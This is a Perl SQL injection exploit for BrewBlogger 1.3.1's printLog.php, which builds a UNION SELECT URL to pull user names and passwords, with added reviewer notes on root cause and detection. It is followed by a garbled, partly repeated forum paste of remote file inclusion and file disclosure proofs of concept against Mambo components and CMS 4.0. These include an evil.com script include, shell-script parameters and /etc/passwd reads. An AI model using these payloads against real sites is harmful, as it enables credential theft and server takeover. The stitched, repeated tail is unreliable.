# BrewBlogger 1.3.1 SQL injection in printLog.php ('id=' parameter)
#
# BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
# Since each user entry contains an auto-incrementing ID number, it is possible to
# enumerate all user names and passwords stored in the 'users' database by iterating
# through every possible ID number.
#
# Vulnerable Code (truncated):
#
#   $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
#   $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
#   $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
# Root cause (reviewer note): addslashes() only escapes quote characters, and the
# value is substituted into the query unquoted ("%s" with no surrounding quotes), so
# anything that is not a bare integer reaches the SQL parser as SQL. Escaping is the
# wrong control for a numeric column; the fix is to cast 'id' to an integer (or bind
# it as a parameter of a prepared statement) and reject any other value.
#
# Detection (reviewer note): a request to printLog.php whose 'id' value is not a
# plain integer - in particular one containing UNION/SELECT, as the URL built below
# does - is a reliable signature for this attack in web-server access logs.
#
# Usage:
# This script will produce a URL which will reveal the user name and password for
# the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
# the first user). The user name will be listed as "Method:" under 'General
# Information', and the password will be listed as "Cost:".
#
# Usage:
# ./brewblog.pl <domain name + path> [user id]
#
# Examples:
#
# ./brewblogger.pl www.beerblog.com 3
# ./brewblogger.pl www.mysite.com/beerblog
#
# (The script is referred to by three different names in this file - brewblog.pl,
# brewblogger.pl and brewlogger.pl; they all mean this file.)
#
# Google Dork:
#
# intext:"BrewBlogger for PHP"
#
# Discovery/code:
#
# Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
###############################################################################

# Banner. Kept as a single-line literal exactly as extracted; in the original this
# was a multi-line string, so the collapsed spaces stand where newlines were.
print ' ########################################### # BrewBlogger 1.3.1 SQL Injection Exploit # # # # Discovered and coded by: Craig Heffner # ########################################### ';

# Usage text when no target is given or -h is passed. Note the script has no
# 'use strict'/'use warnings' and performs no validation of the host/path argument.
if(!$ARGV[0] || $ARGV[0] eq "-h"){
    print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee s cript comments for more details\n";
    exit;
}

# Second argument is the row id in 'users' to look up; defaults to 2 (see header).
if(!$ARGV[1]){
    $id = 2;
}
else {
    $id = $ARGV[1];
}

# Base of the generated URL: the injected value begins with 0 so that no real
# 'brewing' row matches, then a UNION SELECT whose column list is built below.
# The host/path is interpolated as given, over plain http, with no encoding.
$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";

# Column list for the UNION: 210 comma-separated positions, where position 8 is
# user_name, position 9 is password, and every other position is the literal 1
# (a UNION is only accepted when its column count matches the original SELECT *).
# $string is never initialised; '.=' on undef silently starts from the empty string.
$a = 1;
while($a < 211){
    if($a == 8){
        $string .= "user_name,";
    }
    elsif($a == 9){
        $string .= "password,";
    }
    elsif($a == 210){
        $string .= "1";
    }
    else {
        $string .= "1,";
    }
    $a++;
}

# Print the assembled URL; the script only outputs it and never sends a request.
print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WH ERE+id=" . $id . "\n";
exit;
Black_hat_cr(HCE) bug của IPB từ A-Z Code: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=invision&Sear ch=Search Black_hat_cr(HCE) bug của phpbb từ A-Z Code: http://www.osvdb.org/searchdb.php?action=search_title&vuln_title=phpbb&Searc h=Search Black_hat_cr(HCE) CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability Code: Vulnerable Software:cm68news Vulnerable file: /engine/oldnews.inc.php Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.t xt?& Black_hat_cr(HCE) CMS 4.0 Multiple Remote File Include Vulnerabilities Code: http://www.example.com/[path]/index.php?DIR_PLUGINS=[shell_script] http://www.example.com/[path]/install.php?DIR_LIBS=[shell_script] http://www.example.com/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script] http://www.example.com/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell _script] http://www.example.com/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_scri pt] http://www.example.com/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[sh ell_script] http://www.example.com/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script] Black_hat_cr(HCE) com_flyspray Mambo Com. 
<= 1.0.1 Remote File Disclosure Vulnerability
Code:
*************************************************************************************************************************
Component name: com_flyspray
Affected Version: 1.0.1
d.page: http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*************************************************************************************************************************
Author: Dr Max Virus
Location: Egypt
*************************************************************************************************************************
Bug in: startdown.php
Vul Code: In Line 52: readfile($file);
Problem: the $file variable is not sanitized, so any file on the server can be read, including the config file.
*************************************************************************************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config. inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file= / / / / /etc/passwd%00
*************************************************************************************************************************
Black_hat_cr(HCE)
com_loudmouth Mambo Component <= 4.0j Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulnerability
download : http://mamboxchange.com/frs/download mouth-4.0j.zip
bug found in file abbc.class.php :
include( $GLOBALS['mosConfig_absolute_path'].'/components/com_loudmouth/includes/abbc/abbc.config.php');
http://[site]/[path]/components/com_loudmounth/includes/abbc/abbc.class.php? mosConfig_absolute_path=[attacker]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
Black_hat_cr(HCE) .
Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker [at] dalnet crew, #mardongan, #motha, #papmahackerlink
Black_hat_cr(HCE) .
Mambo Component <= 4.0j Include Vulnerability
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo component remote inclusion vulnerability
download : http://mamboxchange.com/frs/download